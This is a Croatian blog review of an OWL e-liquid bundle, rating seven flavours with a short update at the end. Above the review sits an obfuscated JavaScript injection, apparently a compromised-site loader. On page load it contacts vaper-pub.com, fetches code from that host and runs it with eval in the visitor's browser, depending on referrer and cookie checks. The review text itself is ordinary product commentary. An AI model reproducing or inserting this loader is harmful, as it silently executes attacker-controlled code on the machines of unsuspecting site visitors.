;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Recenzija e tekućina OWL Allday Bundle O-M

Recenzija e tekućina OWL Allday Bundle O-M

by Tomislav

OPĆENITO

Naručio sam iz Njemačke preko prijatelja ovaj bundle od 7 e tekućina za 34.85 € (ispadne dajedna bočica dođe nekih 37 kn, što i nije baš jeftino ako bi se računala i poštarina) www.owl-dampfer.de/

-Pakiranje: svaka aroma dođe u maloj bočici od 10ml, a strpana je u longfill od 120ml(na više razina praktično)

-Deklaracije i upute: sve je na Njemačkom, nisam se ni trudio čitati

-Steepanje: za sve arome je preporučeno 5-10 dana (samo jedna nije voćna), probao sam neke odmah isti dan i bile su
odvratne, alisu dobile jako fin okus već nakon 6-7dana

-Arome: lubenica-energy, breskva ledeni čaj, kaktus-kiwi, naranča-limun (cool), bijeli čaj-crveno voće, limun bombon(cool), kolač-badem-lješnjak

-Iako je samo na dvije arome jasnona značeno u nazivu da imaju cooling(naranča-limun i limun bonbon), može ga se naći u puno manjem intenzitetu u okusima lubenica-energy te breskva ledeni čaj

-Parenje: sve na 12W, Voopoo TR1 1.2ohm, samo MTL, Unchained 70/30 9mg baza

TEKUĆINE

OWL O – Watermelon Energy/lubenica-energy

Hmm… Nisam fan lubenice, ni malo… Nisam fan ni ove tekućine nešto posebno, ali je zanimljiva. Osjeti se cooling, osjeti se taj neki miks energetskog pića i lubenice, osjeti se još nešto slatkasto… Možda neko crveno voće… Ima pristojan hit, jako fin miris, ne ostavlja loš after-taste u ustima, ali meni jednostavno nije nešto što bih mogao pariti cijeli dan. Možda je bolja na DL-u s manje nikotina, ali u te vode nemam namjeru ulaziti… Dat ću joj drugu šansu nakon što odstoji još desetak dana pa dodati update ako mi se mišljenje promijeni.

5.5/10

OWL W – Peach green tea/breskva ledeni čaj

Iako naziv tekućine kaže da je zeleni čaj u pitanju – nije! Radi se o klasičnom ledenom čaju s okusom breskve. Malo mi je čudno jer na mahove osjetim dašak hladila, a dašak neke blage suhoće, dok je after-taste te neutralan te mrvicu slatko-gorak. Teško je opisati, ali nema se tu što previše razglabati – ledeni čaj od breskve koji po meni nije baš najspretnije izveden. Meni osrednja aroma, kolegama s posla sasvim uredu.

4.5/10

OWL L – Kaktus Kiwi Komplex/kaktus-kiwi

Pomalo sam se pribojavao ove tekućine jer nisam znao što očekivati od nje. Nikada nisam probao kaktus ni u kojem obliku, a nisam probao ni SHAKE Bang za koji su mi rekli da ima odličnu aromu kaktusa koji se fino miješa s limunadom. Uglavnom… Ovdje se osjeti taj kaktus kao neka čudna, a opet zanimljiva aroma pomiješana s kiwijem koji, po meni, dominira. Prijatelj s posla kaže da je okus jako sličan soku od kaktusa iz Lidla (El Tequito – Apple, Cactus Fruit & Lime Juice Drink) pa eto reference, ako mu je vjerovati. Sve u svemu, solidna tekućina koja može zadovoljiti nepce željno voćnog okusa, a da nije nešto od standardne ponude, tipa jagoda, jabuka, grožđe, bobice, i slično.

6.5/10

OWL – (Minus) – Orange, citrone, frisch/naranča-limun (cool)

Dan nakon miksanja, okus je bio bljutav i ništa se nije raspoznavalo, osjetio se samo cooling i neko voće u pozadini. Nakon 7 dana okus je odličan! Cooling je totalno pao u drugi plan i osjeti se malo na samom početku i u tragovima u after-tasteu. Prilikom udisaja osjeti se blaga gorčina narančine kore, slatkoća naranče (i možda čak klementine), a prilikom ispuhivanja dominaciju preuzima limun. Imam dojam da sam već negdje osjetio sličan okus, ali ne znam gdje točno (ne znam jesu li u pitanju neki bomboni, želei ili nešto sasvim deseto). Sve u svemu, jako fin okus koji odlično ide uz kavu i sok, a odličan je za razbijanje monotonije nakon pušenja duhanskih tekućina.

8/10

OWL D – Weisser Tee, Rote Beeren/bijeli čaj-crveno bobičasto voće

Ako ste fan čajeva, pogotovo bijelog čaja, ova će vam se tekućina jako svidjeti! Savršeno pogođena nota slatkog, blagog, laganog i osvježavajućeg čaja pomiješanog s nekim bobicama. ne mogu odgonetnuti o kojem se voću radi, jer je čaj dominantan, a voćna nota mu je samo support da ne bude monotono i bljutavo. Na mahove kao da se radi o nekom šipku i brusnicama, ali stvarno nisam siguran. Prilikom udisaja odmah se osjeti ta čajna baza, dok na nepcu ostaje miks čaja i nekog slatkog voća. Možda bih za one koji nisu pili bijeli čaj najbolje mogao opisati okus kao neki miks lagano zaslađenog i ohlađenog zelenog čaja i čaja od kamilice kojeg pijete dok grickate neko malo manje slatko voće. Ovo opet nije nešto što bih mogao pariti cijeli dan, ali je okus dosta zanimljiv i primamljiv – prilikom testiranja sam potrošio tank od 2 ml u roku od 20 minuta. :) Ocjena je niža samo zato što ovo ne vidim kao tekućinu za cjelodnevnu uporabu, u protivnom bi bila barem za bod viša.

6.5/10

OWL A – Fruchtig frische zitronenbonbon/limun bombon (cool)

Udahneš topli oblak dima s okusom limuna, izdahneš ledenu paru i gorčina limuna ti zaostane na nepcu. Uf… Okus me mahom podsjeća na miks Kanditovih mentol bombona od limuna i žutih Airwaves žvakaćih. Meni osobno malo „preteška“ tekućina. Ne znam je li do coolinga ili čega, ali ovo je okus koji bih mogao pariti tek jednom tjedno i to najviše 1-2 ml. Da se razumijemo, volim limun i limetu, volim citruse općenito, ali ovo mi ne odgovara baš najbolje, iako je taj neki okus bombona s limunom definitivno dobro pogođen. Nekome će možda odgovarati više, možda je na DL-u s manje nikotina bolji, možda bi s nekim RDL grijačem to bila prava stvar, ne znam. Kako god, vjerujem da ću ga pokušati mijenjati s nekime za nešto drugo, budem li imao sreće.

4/10

OWL M – Kuchen Mandel Haselnuss/kolač-badem-lješnjaci

Ovo je tekućina kojoj sam se pored naranče-limuna najviše veselio, možda zato što je jedina desertna, a možda i zato što volim bademe i kolače. Drugi sam se dan dobrano razočarao, jer mi je želja bila jača od razuma i nisam mogao dočekati da odleži koliko treba. Svaki puff je bio odvratan – imao sam osjećaj da parim jeftinu „Almond Hand Cream“ iz Offertissime i želio sam da mi netko okonča muke. Nisam izdržao ni 20 puffova, već sam prolijevao i ispirao tank… Nakon 6 dana priča se promijenila, naravno… Mislim da bi trebao još stajati da mu izbije prava aroma, ali sada je dovoljno dobar. Svaki puff je mrvu drukčiji, a miješaju se razni okusi, različitim intenzitetima. Najprisutniji je neki okus nalik petit keksima s bademastim notama i prženim lješnjacima u drugom planu. Tekućinu je stvarno ugodno pariti – mnoštvo tople pare, osjećaj punoće u ustima te slatkasti i kremasti after-taste.

7.5/10

ZAKLJUČAK

Mogu reći da sampoprilično zadovoljan tekućinama, s obzirom na to da sam kupovao bundle na slijepo čisto da nešto novo isprobam, da ne moram previše razmišljati u moru izbora te što je bilo puno voća na jednom mjestu. Lubenica, limun bombon i breskva ledeni čaj bi mogli ići u prodaju ili na trampu ako mi se prilikom drugog „testiranja“ ne svide, ali vidjet ćemo… Četiri od sedam okusa su mi super, što je po meni dobar rezultat s obzirom na okolnosti.

Zbog čega ni jedna tekućina nema ocjenu višu od 8/10? Usporedbe radi…

  – Ocjenu 10/10 trenutno kod mene drže: Coco, Spirit, Le Jardinov Mango Django

  – Ocjena 9/10 trenutno pripada tekućinama: Shake 4, Shake Tram 11, Shake Cherry
     Infamousov Yellow Drops

Uglavnom, to bi bilo to…

Ugodno parenje i do čitanja! :)

Želite li i vi podijeliti svoje mišljenje i recenziju nekog proizvoda – javite se administratoru na admin@aeon.hr odnosno Qarku.

Choose your Reaction!
  • Update: lubenica-energy, limun bombon i breskva ledeni čaj su nešto bolje nego prije 5 dana.

    Lubenica se sada može fino pariti, limun bombon počinje dobivati zanimljivu teksturu, a breskva ledeni čaj je mrvicu bolja, iako mi je još uvijek promašen recept.

Leave a Comment